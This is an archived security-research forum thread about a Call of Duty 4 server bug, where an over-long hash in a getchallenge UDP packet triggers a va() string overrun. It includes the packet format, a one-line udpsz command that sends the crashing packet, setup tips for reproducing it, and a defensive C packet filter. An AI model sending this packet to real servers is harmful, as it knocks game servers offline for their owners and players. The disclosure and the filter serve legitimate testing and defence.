Luigi Auriemma

aluigi.org (ARCHIVE-ONLY FORUM!)

All times are UTC [ DST ]





 Post subject: cod4 Attempted to overrun string in call to va()
PostPosted: 07 Jul 2010 08:53 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
just an update to the advisory I released 2 years ago.
indeed, to exploit this bug it is not necessary to join the server; a getchallenge packet with a long hash like the following example is enough:

yyyygetchallenge 0 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...1024...aaa

so:
Code:
udpsz -C ffffffff6765746368616c6c656e6765203020 -b A SERVER PORT 2000
obviously if the server uses my cod4vawo.lpatch work-around it's immune.
for additional info about the bug, I remind you of my advisory:
http://aluigi.org/adv/cod4vamap-adv.txt
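
A defensive pre-filter for the getchallenge packet discussed in the post above, as an added example that is not part of the original thread and is not the cod4vawo.lpatch code: it classifies a UDP payload and rejects any getchallenge whose argument (such as the hash) is over-long. MAX_ARG_LEN, the function names and the test payloads are assumptions made for illustration.

```c
#include <stddef.h>
#include <string.h>

#define MAX_ARG_LEN 64  /* assumed policy limit per argument, not a value from the game */

enum verdict { PKT_OTHER, PKT_OK, PKT_REJECT };

/* Classify one UDP payload before it is handed to the game server. */
enum verdict check_getchallenge(const unsigned char *pkt, size_t len)
{
    static const unsigned char hdr[] = "\xff\xff\xff\xffgetchallenge";
    const size_t hlen = sizeof(hdr) - 1;   /* 4 marker bytes + 12 command bytes */
    size_t i, run = 0;

    if (len < hlen || memcmp(pkt, hdr, hlen) != 0)
        return PKT_OTHER;
    /* a longer command name that merely starts with "getchallenge" is not ours */
    if (len > hlen && pkt[hlen] != ' ' && pkt[hlen] != '\n' && pkt[hlen] != '\0')
        return PKT_OTHER;

    for (i = hlen; i < len; i++) {
        unsigned char c = pkt[i];
        if (c == ' ' || c == '\n' || c == '\0') {  /* separator: next argument */
            run = 0;
            continue;
        }
        if (c < 0x20 || c > 0x7e)       /* non-printable byte inside an argument */
            return PKT_REJECT;
        if (++run > MAX_ARG_LEN)        /* over-long argument, e.g. the hash */
            return PKT_REJECT;
    }
    return PKT_OK;
}

/* Constructed test payload: "getchallenge 0 " followed by n filler bytes. */
enum verdict sample_verdict(size_t n)
{
    unsigned char buf[2048];
    const size_t off = 19;               /* 4 + strlen("getchallenge 0 ") */
    if (n > sizeof(buf) - off) n = sizeof(buf) - off;
    memcpy(buf, "\xff\xff\xff\xffgetchallenge 0 ", off);
    memset(buf + off, 'a', n);
    return check_getchallenge(buf, off + n);
}

int main(void)
{
    return sample_verdict(32) == PKT_OK && sample_verdict(1024) == PKT_REJECT ? 0 : 1;
}
```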


 
 
 Post subject: Re: cod4 Attempted to overrun string in call to va()
PostPosted: 07 Jul 2010 13:07 

Joined: 08 May 2010 17:58
Posts: 55
Location: In vast nothingness of space...
I tried this, both from ingame, and with udpsz, but the bug simply doesn't work, and my server doesn't have that lpatch
it's cod4 1.7 (i guess that's the version it's supposed to work on)
i think i did all that's supposed to be done to activate the exploit...


 
 Post subject: Re: cod4 Attempted to overrun string in call to va()
PostPosted: 07 Jul 2010 15:51 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
have you launched the server as internet server?

I forgot to say it (and I must still upload the updated advisory), but that part of the getchallenge packet involved in the bug doesn't work on a LAN server.
so remember to start the server with +set dedicated 2


 
 Post subject: Re: cod4 Attempted to overrun string in call to va()
PostPosted: 07 Jul 2010 18:54 

Joined: 08 May 2010 17:58
Posts: 55
Location: In vast nothingness of space...
well, i tested it on a server that i have for testing all stuff, and which is online all the time (so it's dedicated)

i even tried from ingame, using callvote, and even when the vote passes, nothing happens
and my server doesn't have the patch


 
 Post subject: Re: cod4 Attempted to overrun string in call to va()
PostPosted: 07 Jul 2010 20:19 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
maybe you have a magic server :)


 
 Post subject: Re: cod4 Attempted to overrun string in call to va()
PostPosted: 07 Jul 2010 20:46 

Joined: 08 May 2010 17:58
Posts: 55
Location: In vast nothingness of space...
haha, maybe i do :P

tho, i asked a friend to test this out on his server too, and it came out with the same result: nothing happened (didn't check callvote, but that wasn't my goal anyways)
so i'm pretty convinced that this is patched somehow
btw. my friend's server is cod5, not cod4


 
 Post subject: Re: cod4 Attempted to overrun string in call to va()
PostPosted: 07 Jul 2010 21:16 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
indeed cod5 is not vulnerable.
the "va overrun" bug and particularly that getchallenge way works only on cod4 in internet mode


 
 Post subject: Re: cod4 Attempted to overrun string in call to va()
PostPosted: 07 Jul 2010 21:44 

Joined: 08 May 2010 17:58
Posts: 55
Location: In vast nothingness of space...
hmm, well, if my server isn't vulnerable, then i don't really care if the exploit actually works or not :D


 
 Post subject: Re: cod4 Attempted to overrun string in call to va()
PostPosted: 08 Jul 2010 16:24 

Joined: 27 May 2010 19:08
Posts: 23
I got the same. It doesn't work.
It is a CoD 4 Dedicated 2 server. Voting is disabled. Or should voting be enabled?

I removed my server IP and replaced it with 00.
http://i27.tinypic.com/dbh66x.jpg


 
 Post subject: Re: cod4 Attempted to overrun string in call to va()
PostPosted: 08 Jul 2010 16:57 

Joined: 24 Jun 2010 10:04
Posts: 70
Location: aluigi not @ home
are you sure that server doesn't have my patches applied?
are you sure it is NOT a cracked server?
because that part with the aaaaaaa is a hash that the client sends to the server so that it checks it remotely with the cod4 auth server and then allows or rejects the client (needcdkey).

in any case the tests must be performed with a clean server so:
- install cod4
- patch with 1.07
- start the server with +set dedicated 2
- test it


 
 Post subject: Re: cod4 Attempted to overrun string in call to va()
PostPosted: 08 Jul 2010 17:14 

Joined: 08 May 2010 17:58
Posts: 55
Location: In vast nothingness of space...
now i know what the problem was - cracked server
either i didn't notice that you wrote that as a condition for the bug to work, or you really didn't write that :P

anyways, i'll try to test it on a non-cracked one and i'll post how it turns out


 
 Post subject: Re: cod4 Attempted to overrun string in call to va()
PostPosted: 08 Jul 2010 17:23 

Joined: 24 Jun 2010 10:04
Posts: 70
Location: aluigi not @ home
I didn't write it because I always refer to the default installation without external customizations


 
 Post subject: Re: cod4 Attempted to overrun string in call to va()
PostPosted: 08 Jul 2010 17:50 

Joined: 27 May 2010 19:08
Posts: 23
Yea it was cracked.
Sorry for my failing @ reading.

I will try it again.

Thanxs :)

